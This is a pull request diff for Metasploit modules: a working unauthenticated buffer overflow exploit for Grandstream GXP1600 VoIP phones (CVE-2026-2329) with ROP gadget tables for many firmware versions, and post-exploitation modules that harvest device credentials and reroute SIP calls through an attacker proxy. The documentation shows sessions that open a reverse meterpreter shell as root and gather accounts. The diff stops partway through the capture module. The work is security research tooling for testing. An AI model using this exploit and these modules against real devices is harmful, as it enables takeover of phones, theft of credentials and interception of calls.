### PR TITLE
Add exploit (CVE-2026-2329) and auxiliary modules for the Grandstream GXP1600 series

### DIFF
--- a/documentation/modules/exploit/linux/http/grandstream_gxp1600_unauth_rce.md
+++ b/documentation/modules/exploit/linux/http/grandstream_gxp1600_unauth_rce.md
@@ -1,0 +1,134 @@
+## Vulnerable Application
+An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint
+/cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote
+code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models
+in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630. The vulnerability affects all
+firmware versions below version 1.0.7.81.
+
+## Testing
+This module was verified on a GXP1630 device running firmware version 1.0.7.78.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/grandstream_gxp1600_unauth_rce`
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+
+Configure the payload to execute:
+
+4. `set PAYLOAD cmd/linux/http/armle/meterpreter_reverse_tcp`
+5. `set RHOST eth0`
+6. `set RPORT 4444`
+7. `set FETCH_SRVHOST <MSF_IP_ADDRESS>`
+
+Run the module:
+
+8. `check`
+9. `exploit`
+
+## Scenarios
+
+### Example 1
+
+```
+msf > use exploit/linux/http/grandstream_gxp1600_unauth_rce 
+[*] Using configured payload cmd/linux/http/armle/meterpreter_reverse_tcp
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > set RHOST 192.168.86.77
+RHOST => 192.168.86.77
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > set LHOST eth0
+LHOST => 192.168.86.122
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > set FETCH_SRVHOST eth0
+[-] The following options failed to validate: Value 'eth0' is not valid for option 'FETCH_SRVHOST'.
+FETCH_SRVHOST => 
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > set FETCH_SRVHOST 192.168.86.122
+FETCH_SRVHOST => 192.168.86.122
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > show options 
+
+Module options (exploit/linux/http/grandstream_gxp1600_unauth_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
+   RHOSTS     192.168.86.77    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to web admin
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/armle/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Pyth
+                                              on ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST   192.168.86.122   no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           192.168.86.122   yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      eHuRcleTyo       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > check
+[*] 192.168.86.77:80 - The target appears to be vulnerable. GrandStream GXP1630 version 1.0.7.78
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. GrandStream GXP1630 version 1.0.7.78
+[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.77:59112) at 2026-02-16 12:21:07 +0000
+[!] This exploit may require manual cleanup of '/tmp/core.gz' on the target
+[!] This exploit may require manual cleanup of '/core' on the target
+
+meterpreter > getuid 
+Server username: root
+meterpreter > sysinfo
+Computer     : gxp1630_c074ade84b53
+OS           :  (Linux 3.4.20-rt31-dvf-v1.3.1.2-rc1)
+Architecture : armv5tejl
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > pwd
+/app/war/cgi-bin
+meterpreter > background 
+[*] Backgrounding session 1...
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                  Connection
+  --  ----  ----                     -----------                  ----------
+  1         meterpreter armle/linux  root @ gxp1630_c074ade84b53  192.168.86.122:4444 -> 192.168.86.77:59112 (192.168.86.77)
+
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > 
+```

--- a/documentation/modules/post/linux/capture/grandstream_gxp1600_sip.md
+++ b/documentation/modules/post/linux/capture/grandstream_gxp1600_sip.md
@@ -1,0 +1,119 @@
+## Vulnerable Application
+This capture module works against Grandstream GXP1600 series VoIP devices and can reconfigure hte device to use an
+arbitrary SIP proxy. You can first leverage the `exploit/linux/http/grandstream_gxp1600_unauth_rce` exploit
+module to get a root session on a target GXP1600 series device before running this post module.
+
+## Testing
+This module was verified on a GXP1630 device running firmware version 1.0.7.78. A suitable SIP proxy must be running. An
+example SIP proxy for testing and auditing SIP infrastructure is [here](https://github.com/sfewer-r7/sip-proxy).
+
+## Verification Steps
+
+1. Leverage the `exploit/linux/http/grandstream_gxp1600_unauth_rce` exploit module to get a root session on a
+   target GXP1600 series device.
+2. `use post/linux/capture/grandstream_gxp1600_sip`
+
+Specify the target session to run this post module against:
+
+3. `sessions -l`
+4. `set SESSION <SESSION_ID>`
+
+Specify the remote IP address and port of your SIP proxy:
+
+5. `set SIP_PROXY_HOST 192.168.86.35`
+6. `set SIP_PROXY_UDP_PORT 5060` (If different from the default `5060`).
+
+List the configured SIP account and choose which one to proxy:
+7. `list`
+8. `set SIP_ACCOUNT_INDEX 0`
+
+Sart and stop proxying SIP traffic:
+9. `start`
+10. `stop`
+
+## Scenarios
+
+### Example 1
+
+NOTE: All account information below has been redacted via `*` characters.
+
+```
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                  Connection
+  --  ----  ----                     -----------                  ----------
+  1         meterpreter armle/linux  root @ gxp1630_c074ade84b53  192.168.86.122:4444 -> 192.168.86.77:59112 (192.168.86.77)
+
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > use linux/capture/grandstream_gxp1600_sip 
+msf post(linux/capture/grandstream_gxp1600_sip) > set SESSION 1
+SESSION => 1
+msf post(linux/capture/grandstream_gxp1600_sip) > set SIP_PROXY_HOST 192.168.86.35
+SIP_PROXY_HOST => 192.168.86.35
+msf post(linux/capture/grandstream_gxp1600_sip) > show options 
+
+Module options (post/linux/capture/grandstream_gxp1600_sip):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   SESSION             1                yes       The session to run this module on
+   SIP_PROXY_HOST      192.168.86.35    yes       The remote SIP proxy host address
+   SIP_PROXY_UDP_PORT  5060             yes       The remote SIP proxy UDP port
+
+
+   When ACTION is one of start,stop:
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   SIP_ACCOUNT_INDEX  0                no        The zero-based SIP Account index to operate on.
+
+
+Post action:
+
+   Name  Description
+   ----  -----------
+   list  List all SIP accounts.
+
+
+
+View the full module info with the info, or info -d command.
+msf post(linux/capture/grandstream_gxp1600_sip) > list
+[*] Module running against phone model GXP1630
+SIP Accounts
+============
+
+ Account Index  Account Enabled  Account Name  Display Name  User ID       Registrar Server            Registrar Server Transport  Outbound Proxy  Can Capture?
+ -------------  ---------------  ------------  ------------  -------       ----------------            --------------------------  --------------  ------------
+ 0              Yes              ********                    **********    ***************:8060        udp                                         Yes
+ 1              No               *********                   ************  *********************:5060  udp                                         Yes
+ 2              No                                                                                     udp                                         No
+
+[*] Post module execution completed
+msf post(linux/capture/grandstream_gxp1600_sip) > set SIP_ACCOUNT_INDEX 0
+SIP_ACCOUNT_INDEX => 0
+msf post(linux/capture/grandstream_gxp1600_sip) > start
+[*] Module running against phone model GXP1630
+[*] Post module execution completed
+msf post(linux/capture/grandstream_gxp1600_sip) > list
+[*] Module running against phone model GXP1630
+SIP Accounts
+============
+
+ Account Index  Account Enabled  Account Name  Display Name  User ID       Registrar Server            Registrar Server Transport  Outbound Proxy      Can Capture?
+ -------------  ---------------  ------------  ------------  -------       ----------------            --------------------------  --------------      ------------
+ 0              Yes              ********                    **********    ***************:8060        udp                         192.168.86.35:5060  Yes
+ 1              No               *********                   ************  *********************:5060  udp                                             Yes
+ 2              No                                                                                     udp                                             No
+
+[*] Post module execution completed
+msf post(linux/capture/grandstream_gxp1600_sip) > stop
+[*] Module running against phone model GXP1630
+[*] Reading SIP account backup configuration: /tmp/10a334a378afafffb9d874b6907836d784df4cba
+[*] Decrypting SIP account backup configuration.
+[*] Reverting SIP account backup configuration
+[*] Deleting SIP account backup configuration: /tmp/10a334a378afafffb9d874b6907836d784df4cba
+[*] Post module execution completed
+msf post(linux/capture/grandstream_gxp1600_sip) >
+```

--- a/documentation/modules/post/linux/gather/grandstream_gxp1600_creds.md
+++ b/documentation/modules/post/linux/gather/grandstream_gxp1600_creds.md
@@ -1,0 +1,62 @@
+## Vulnerable Application
+This gather module works against Grandstream GXP1600 series VoIP devices and can collect HTTP, SIP, and TR-069
+credentials from a device. You can first leverage the `exploit/linux/http/grandstream_gxp1600_unauth_rce` exploit
+module to get a root session on a target GXP1600 series device before running this post module.
+
+## Testing
+This module was verified on a GXP1630 device running firmware version 1.0.7.78.
+
+## Verification Steps
+
+1. Leverage the `exploit/linux/http/grandstream_gxp1600_unauth_rce` exploit module to get a root session on a
+target GXP1600 series device.
+2. `use post/linux/gather/grandstream_gxp1600_creds`
+
+Specify the target session to run this post module against:
+
+3. `sessions -l`
+4. `set SESSION <SESSION_ID>`
+
+Run the module to gather credentials:
+
+5. `run`
+
+## Scenarios
+
+### Example 1
+
+NOTE: All credential information below has been redacted via `*` characters.
+
+```
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                  Connection
+  --  ----  ----                     -----------                  ----------
+  1         meterpreter armle/linux  root @ gxp1630_c074ade84b53  192.168.86.122:4444 -> 192.168.86.77:59112 (192.168.86.77)
+
+msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > use post/linux/gather/grandstream_gxp1600_creds 
+msf post(linux/gather/grandstream_gxp1600_creds) > set SESSION 1
+SESSION => 1
+msf post(linux/gather/grandstream_gxp1600_creds) > show options 
+
+Module options (post/linux/gather/grandstream_gxp1600_creds):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  1                yes       The session to run this module on
+
+
+View the full module info with the info, or info -d command.
+
+msf post(linux/gather/grandstream_gxp1600_creds) > run
+[*] Module running against phone model GXP1630
+[+] Gathered HTTP account admin:********
+[+] Gathered HTTP account user:123
+[+] Gathered SIP account <sip:**********@***************:8060;transport=udp> with a password of ********
+[+] Gathered SIP account <sip:************@*********************:5060;transport=udp> with a password of **********
+[*] Post module execution completed
+msf post(linux/gather/grandstream_gxp1600_creds) >
+```

--- a/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
+++ b/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
@@ -148,6 +148,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     rop = [
       :rand4, # padding
+      # The vulnerable function returns via this function epilogue: POP {R4-R11,PC}
+      # So we initially get control of registers r4 - r11, and then execute gadget1_blx_pop via the overwritten PC.
       rop_table[:address_data_section], # r4 -> .data segment
       :rand4, # r5
       :rand4, # r6

--- a/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
+++ b/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
@@ -210,6 +210,22 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  # The vulnerability only allows for a single null terminator byte to be written during the overflow. To overcome this
+  # limitation, we can rely on the fact that the vulnerable function will process the attacker-controlled request
+  # parameter as a colon-delimited string of multiple identifiers. Every time a colon is encountered, the overflow can
+  # be triggered a subsequent time via the next identifier. We can leverage this, and the ability to write a single null
+  # byte as the last character in the current identifier being processed, to write multiple null bytes during exploitation.
+  #
+  # For example, if we wanted to write a sequence of bytes with 5 null characters in it, e.g.
+  # "EEE0DDDDDDD0CCCCCCCC00AAAAAAAAAAA0" (where 0 is a null byte)
+  # we can trigger the overflow 5 times by structuring the input as follows:
+  # "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:BBBBBBBBBBBBBBBBBBBBB:CCCCCCCCCCCCCCCCCCCC:DDDDDDDDDDD:EEE"
+  # When the vulnerable function process this colon deliminated input, it will trigger the overflow 5 times, and each
+  # time it will write a null byte at the end of the current identifier being processed. The final memory layout will
+  # be the expected attacker controller byte sequence. Note, the lengths used in this example are contrived for brevity,
+  # as the actual vulnerable function requires a 64 byte buffer to be overflowed for each invocation of the vulnerability.
+  #
+  # The gen_buffer method will take care of restructuring the input in the above described manner.
   def gen_buffer(input, line_padding = '')
     input << "\x00" unless input[input.length - 1] == "\x00"
 

--- a/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
+++ b/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Connection failed') unless server_res
 
-    return CheckCode::Safe unless server_res.code == 200
+    return CheckCode::Unknown("Unexpected response code #{server_res.code}") unless server_res.code == 200
 
     json_data = server_res.get_json_document
 

--- a/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
+++ b/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
@@ -177,6 +177,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     rop.map! do |item|
       if item == :patch_offset2cmd
+        # When the vulnerable function returns, r0 will point into the stack, 28 bytes before the start of our overflow
+        # buffer. We use a gadget (gadget2_add_str_add_str_pop) to add r0 to an offset (held in r3), after this gadget
+        # executes, r3 will point to the OS command we want to execute, which is located on the stack directly after
+        # our ROP chain. The below offset is the value placed in r3 for this calculation.
         item = 28 + overflow_buffer.length + (rop.length * pointer_size)
       elsif item == :rand4
         item = Rex::Text.rand_text_hex(pointer_size).unpack('V').first

--- a/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
+++ b/modules/exploits/linux/http/grandstream_gxp1600_unauth_rce.rb
@@ -1,0 +1,398 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GrandStream GXP1600 Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint
+          /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote
+          code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models
+          in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630. The vulnerability affects all
+          firmware versions below version 1.0.7.81.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # Discovery, Analysis, Exploit
+        ],
+        'References' => [
+          ['CVE', '2026-2329'],
+          # Rapid7 advisory for CVE-2026-2329
+          ['URL', 'www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed'],
+          # Vendor advisory for CVE-2026-2329 (GSVUL-2026-001)
+          ['URL', 'https://psirt.grandstream.com/'],
+          # Vendor release notes (PDF) for the fixed firmware version 1.0.7.81.
+          ['URL', 'https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf']
+        ],
+        'DisclosureDate' => '2026-02-18',
+        'Platform' => %w[linux unix],
+        'Arch' => ARCH_CMD,
+        'Privileged' => true, # /app/bin/gs_web runs as root
+        'Targets' => [
+          [ 'Automatic', {} ],
+        ],
+        'DefaultTarget' => 0,
+        # NOTE: Tested with the following payloads:
+        #   cmd/linux/http/armle/meterpreter_reverse_tcp
+        #   cmd/unix/reverse_netcat
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/armle/meterpreter_reverse_tcp',
+          'RPORT' => 80,
+          'SSL' => false,
+          # A writable directory on the target for fetch based payloads to write to.
+          'FETCH_WRITABLE_DIR' => '/tmp',
+          # Delete the fetch binary after execution.
+          'FETCH_DELETE' => true
+        },
+        'Payload' => {
+          'BadChars' => ':',
+          'Encoder' => 'cmd/base64'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS],
+          'RelatedModules' => [
+            'post/linux/gather/grandstream_gxp1600_creds',
+            'post/linux/capture/grandstream_gxp1600_sip'
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to web admin', '/']),
+      ]
+    )
+  end
+
+  def check
+    version_id = '68'
+    model_id = 'phone_model'
+
+    server_res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api.values.get'),
+      'vars_post' => {
+        'request' => "#{version_id}:#{model_id}"
+      }
+    )
+
+    return CheckCode::Unknown('Connection failed') unless server_res
+
+    return CheckCode::Safe unless server_res.code == 200
+
+    json_data = server_res.get_json_document
+
+    version_str = json_data.dig('body', version_id)
+
+    model_str = json_data.dig('body', model_id)
+
+    return CheckCode::Unknown('Failed to get the version or model info') if version_str.blank? || model_str.blank?
+
+    # These 6 models all share the same firmware for the GXP1600 range.
+    affected_models = %w[GXP1610 GXP1615 GXP1620 GXP1625 GXP1628 GXP1630]
+
+    if affected_models.include? model_str
+      version = Rex::Version.new(version_str)
+
+      # Teh vulnerability was patched in firmware version 1.0.7.81, released January 30, 2026.
+      if version < Rex::Version.new('1.0.7.81')
+        return Exploit::CheckCode::Appears("GrandStream #{model_str} version #{version_str}")
+      end
+    end
+
+    Exploit::CheckCode::Safe("GrandStream #{model_str} version #{version_str}")
+  end
+
+  def exploit
+    version_id = '68'
+
+    server_res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api.values.get'),
+      'vars_post' => {
+        'request' => version_id
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to get version number') unless server_res&.code == 200
+
+    json_data = server_res.get_json_document
+
+    version_str = json_data.dig('body', version_id)
+
+    rop_table = get_rop_table(version_str)
+
+    fail_with(Failure::BadConfig, "No ROP table available for version #{version_str}") unless rop_table
+
+    vprint_status("ROP Table: #{rop_table}")
+
+    unless rop_table[:gadget3_call_exit]
+      print_warning('No ROP gadget available to call exit(). The payload will work, but will crash and core dump the target gs_web process.')
+    end
+
+    pointer_size = 4
+
+    rop = [
+      :rand4, # padding
+      rop_table[:address_data_section], # r4 -> .data segment
+      :rand4, # r5
+      :rand4, # r6
+      :rand4, # r7
+      :rand4, # r8
+      :rand4, # r9
+      :rand4, # r10
+      :rand4, # r11
+      rop_table[:gadget1_blx_pop] + pointer_size, # pc -> pop {r3, pc}
+      :patch_offset2cmd, # r3 -> r0 + r3 == "/bin/sh ..."
+      rop_table[:gadget2_add_str_add_str_pop], # pc -> add r0, r3, r0; str r7, [r4, #8]; add r6, r0, r6; str r6, [r4, #4]; pop {r4, r5, r6, r7, r8, pc};
+      :rand4, # r4
+      :rand4, # r5
+      :rand4, # r6
+      :rand4, # r7
+      :rand4, # r8
+      rop_table[:gadget1_blx_pop] + pointer_size, # pc -> pop {r3, pc}
+      rop_table[:address_system_plt], # r3 -> system@plt
+      rop_table[:gadget1_blx_pop], # pc -> blx r3; pop {r3, pc}
+      :rand4, # r3
+      rop_table[:gadget3_call_exit] || :rand4highnull # pc -> mov r0, 1; bl 0xbcd0 <exit@plt>
+    ]
+
+    overflow_buffer = Rex::Text.rand_text_alpha(64)
+
+    rop.map! do |item|
+      if item == :patch_offset2cmd
+        item = 28 + overflow_buffer.length + (rop.length * pointer_size)
+      elsif item == :rand4
+        item = Rex::Text.rand_text_hex(pointer_size).unpack('V').first
+      elsif item == :rand4highnull
+        item = Rex::Text.rand_text_hex(pointer_size).unpack('V').first & 0x00FFFFFF
+      end
+      item
+    end
+
+    vprint_status("Encoded ARCH_CMD Payload: #{payload.encoded}")
+
+    request_buffer = gen_buffer(
+      rop.pack('V*') << payload.encoded,
+      overflow_buffer
+    )
+
+    register_file_for_cleanup('/tmp/core.gz')
+
+    register_dir_for_cleanup('/core')
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api.values.get'),
+      'vars_post' => {
+        'request' => request_buffer
+      }
+    )
+  end
+
+  def gen_buffer(input, line_padding = '')
+    input << "\x00" unless input[input.length - 1] == "\x00"
+
+    len = input.length
+
+    lines = []
+
+    input.reverse.each_byte do |chr|
+      line = '1' * (len - 1)
+
+      if chr.zero?
+        line << ':'
+      else
+        line << [chr].pack('C')
+      end
+
+      len -= 1
+
+      lines << line
+    end
+
+    res = []
+
+    lines.each do |line|
+      if line.end_with? ':'
+        res << (line_padding + line)
+      else
+        res.last[line_padding.length + line.length - 1] = line[line.length - 1]
+      end
+    end
+
+    res.join
+  end
+
+  def get_rop_table(version_str)
+    rop_tables = {
+      '1.0.7.80' =>
+        {
+          address_system_plt: 0x0000b868,
+          address_data_section: 0x000224c8,
+          gadget2_add_str_add_str_pop: 0x0000f110,
+          gadget1_blx_pop: 0x0000c230,
+          gadget3_call_exit: 0x0000ffc0
+        },
+      '1.0.7.79' =>
+        {
+          address_system_plt: 0x0000b73c,
+          address_data_section: 0x00022490,
+          gadget2_add_str_add_str_pop: 0x0000ef64,
+          gadget1_blx_pop: 0x0000c0ec,
+          gadget3_call_exit: 0x0000fe14
+        },
+      '1.0.7.74' =>
+        {
+          address_system_plt: 0x0000b73c,
+          address_data_section: 0x00022490,
+          gadget2_add_str_add_str_pop: 0x0000ef64,
+          gadget1_blx_pop: 0x0000c0ec,
+          gadget3_call_exit: 0x0000fe14
+        },
+      '1.0.7.70' => {
+        address_system_plt: 0x0000b73c,
+        address_data_section: 0x00022490,
+        gadget2_add_str_add_str_pop: 0x0000ef64,
+        gadget1_blx_pop: 0x0000c0ec,
+        gadget3_call_exit: 0x0000fe14
+      },
+      '1.0.7.67' => {
+        address_system_plt: 0x0000b6c4,
+        address_data_section: 0x00021e6c,
+        gadget2_add_str_add_str_pop: 0x0000ed7c,
+        gadget1_blx_pop: 0x0000c05c,
+        gadget3_call_exit: 0x0000fc2c
+      },
+      '1.0.7.64' => {
+        address_system_plt: 0x0000b6c4,
+        address_data_section: 0x00021e2c,
+        gadget2_add_str_add_str_pop: 0x0000ed38,
+        gadget1_blx_pop: 0x0000c05c,
+        gadget3_call_exit: 0x0000fbe8
+      },
+      '1.0.7.56' => {
+        address_system_plt: 0x0000bd78,
+        address_data_section: 0x00022474,
+        gadget2_add_str_add_str_pop: 0x000140ec,
+        gadget1_blx_pop: 0x0000c6bc,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.50' => {
+        address_system_plt: 0x0000bd78,
+        address_data_section: 0x00022474,
+        gadget2_add_str_add_str_pop: 0x000140ec,
+        gadget1_blx_pop: 0x0000c6bc,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.49' => {
+        address_system_plt: 0x0000bd78,
+        address_data_section: 0x00022474,
+        gadget2_add_str_add_str_pop: 0x000140ec,
+        gadget1_blx_pop: 0x0000c6bc,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.33' => {
+        address_system_plt: 0x0000bd10,
+        address_data_section: 0x00021e0c,
+        gadget2_add_str_add_str_pop: 0x00013ed4,
+        gadget1_blx_pop: 0x0000c63c,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.27' => {
+        address_system_plt: 0x0000bd10,
+        address_data_section: 0x00021e0c,
+        gadget2_add_str_add_str_pop: 0x00013ed4,
+        gadget1_blx_pop: 0x0000c63c,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.24' => {
+        address_system_plt: 0x0000c40c,
+        address_data_section: 0x00021948,
+        gadget2_add_str_add_str_pop: 0x00013b2c,
+        gadget1_blx_pop: 0x0000c600,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.18' => {
+        address_system_plt: 0x0000c40c,
+        address_data_section: 0x00021470,
+        gadget2_add_str_add_str_pop: 0x00013aec,
+        gadget1_blx_pop: 0x0000c5f0,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.13' => {
+        address_system_plt: 0x0000c40c,
+        address_data_section: 0x0002145c,
+        gadget2_add_str_add_str_pop: 0x00013adc,
+        gadget1_blx_pop: 0x0000c5f0,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.6' => {
+        address_system_plt: 0x0000c40c,
+        address_data_section: 0x0002145c,
+        gadget2_add_str_add_str_pop: 0x00013adc,
+        gadget1_blx_pop: 0x0000c5f0,
+        gadget3_call_exit: nil
+      },
+      '1.0.7.3' => {
+        address_system_plt: 0x0000c40c,
+        address_data_section: 0x0002145c,
+        gadget2_add_str_add_str_pop: 0x00013adc,
+        gadget1_blx_pop: 0x0000c5f0,
+        gadget3_call_exit: nil
+      },
+      '1.0.5.3' => {
+        address_system_plt: 0x0000c40c,
+        address_data_section: 0x0002145c,
+        gadget2_add_str_add_str_pop: 0x00013adc,
+        gadget1_blx_pop: 0x0000c5f0,
+        gadget3_call_exit: nil
+      },
+      '1.0.4.152' => {
+        address_system_plt: 0x0000c40c,
+        address_data_section: 0x0002145c,
+        gadget2_add_str_add_str_pop: 0x00013adc,
+        gadget1_blx_pop: 0x0000c5f0,
+        gadget3_call_exit: nil
+      },
+      '1.0.4.140' => {
+        address_system_plt: 0x0000c358,
+        address_data_section: 0x00021454,
+        gadget2_add_str_add_str_pop: 0x000137e8,
+        gadget1_blx_pop: 0x0000c53c,
+        gadget3_call_exit: nil
+      },
+      '1.0.4.132' => {
+        address_system_plt: 0x0000c358,
+        address_data_section: 0x00020c2c,
+        gadget2_add_str_add_str_pop: 0x00013558,
+        gadget1_blx_pop: 0x0000c53c,
+        gadget3_call_exit: nil
+      },
+      '1.0.4.128' => { # Released August 3, 2018.
+        address_system_plt: 0x0000c17c,
+        address_data_section: 0x0001e9c4,
+        gadget2_add_str_add_str_pop: 0x00011cc8,
+        gadget1_blx_pop: 0x0000c360,
+        gadget3_call_exit: nil
+      }
+    }
+
+    rop_tables[version_str]
+  end
+
+end

--- a/modules/post/linux/capture/grandstream_gxp1600_sip.rb
+++ b/modules/post/linux/capture/grandstream_gxp1600_sip.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'GrandStream GXP1600 proxy SIP traffic',
         'Description' => %q{
-          This capture module works against Grandstream GXP1600 series VoIP devices and can reconfigure hte device to use an
+          This capture module works against Grandstream GXP1600 series VoIP devices and can reconfigure the device to use an
           arbitrary SIP proxy. You can first leverage the `exploit/linux/http/grandstream_gxp1600_unauth_rce` exploit
           module to get a root session on a target GXP1600 series device before running this post module.
         },
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Post
           'Stability' => [
             # The phone service will not crash as we are only reconfiguring the phone.
             CRASH_SAFE,
-            # If we don't revert the config changes after we proxy a SIP account, that SIP account cant operate if
+            # If we don't revert the config changes after we proxy a SIP account, that SIP account can't operate if
             # the remote proxy is down.
             SERVICE_RESOURCE_LOSS
           ],

--- a/modules/post/linux/capture/grandstream_gxp1600_sip.rb
+++ b/modules/post/linux/capture/grandstream_gxp1600_sip.rb
@@ -1,0 +1,295 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GrandStream GXP1600 proxy SIP traffic',
+        'Description' => %q{
+          This capture module works against Grandstream GXP1600 series VoIP devices and can reconfigure hte device to use an
+          arbitrary SIP proxy. You can first leverage the `exploit/linux/http/grandstream_gxp1600_unauth_rce` exploit
+          module to get a root session on a target GXP1600 series device before running this post module.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7'
+        ],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Actions' => [
+          ['list', { 'Description' => 'List all SIP accounts.' }],
